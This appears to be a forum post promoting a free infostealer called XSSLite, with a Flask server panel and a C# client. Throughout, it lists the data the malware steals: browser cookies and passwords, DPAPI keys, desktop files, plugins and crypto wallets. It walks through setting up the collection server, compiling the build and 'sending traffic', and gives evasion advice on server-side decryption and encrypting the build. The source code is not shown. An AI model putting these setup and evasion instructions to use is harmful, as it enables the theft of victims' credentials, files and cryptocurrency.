XSSLite is a styler with a web panel designed to collect various data from your computer and send it to your server.
Functional:
1. Collection of Chromium browsers
2. Grabber files from the desktop
3. Collection of absolutely all plugins from the browser
4. Collection of crypto wallets
5. Collecting information about the system
6. Decryption of logs on the server side
Setting up and installing the panel:
1. Buy a RDP
2. Open ports
3. Install Python 3.11
4. Run Install.bat and wait for all libraries to download
5. Go to the config.json file
6. Replace localhost with the ip of your VDS
7. Replace 80 with the port you opened
8. Replace login and password with the one you need, these data will be used to log into the panel
9. Go to CMD in the XSSLite folder and enter the command python start.py
Now your panel is ready and you can enter it by following the link that was displayed in the console
Setting up and compiling the build:
1. Go to the XSSLite\Client\Client folder and open config.cs and then replace the link with the link of your server
2. Open Client.sln located in the XSSLite\Client folder
3. Compile in Release mode
Now your build is ready and you can start sending traffic
Why did I decide to publish such software?
Initially, I made RAT+Stealer in one, in order to sell it in the future, and I have already completed it. But I decided that it would be better to rewrite it in C++. At that moment, I learned about the competition and decided that I would remake my software as a simple stealer. As a result, I cut out the RAT functionality and a couple of stealer functions too (otherwise it would be too awkward to put such ready-made software in the public domain). Well, that’s how this free project appeared.
What is the project written on?
The server part (Panel) is written in Python Flask.
The client part is written in C#.
How is the collection and sending of cookies and passwords to the server implemented?
A copy of cookies and passwords is created. The software also receives the dpapi key and puts it all in the form of bytes inside json. Then it is sent to the server. Already on the server, the received data is decrypted using aes. After decrypting all the data, they are written to the usual txt files.
Why did I decide to do server-side decryption?
Because this should help reduce detections on the build, as fewer suspicious activities occur. Well, simply because it was easier for me to write a decryption in Python than in C#.
Postscript:
This software is just a rough draft of what I plan to do. In a future version, which will be intended for sale, I will rewrite the client part (build) in C++ and also add new functionality. But just because this version of the program is a draft, this does not mean that you cannot work with it. This version is quite usable and ready to use; most importantly, do not forget to encrypt the build.
Xsslite Stealer Latest Vesion Source Code
Xsslite Stealer Latest Vesion Source Code
You need to be registered to download the file. Please register or log in to access the attached files.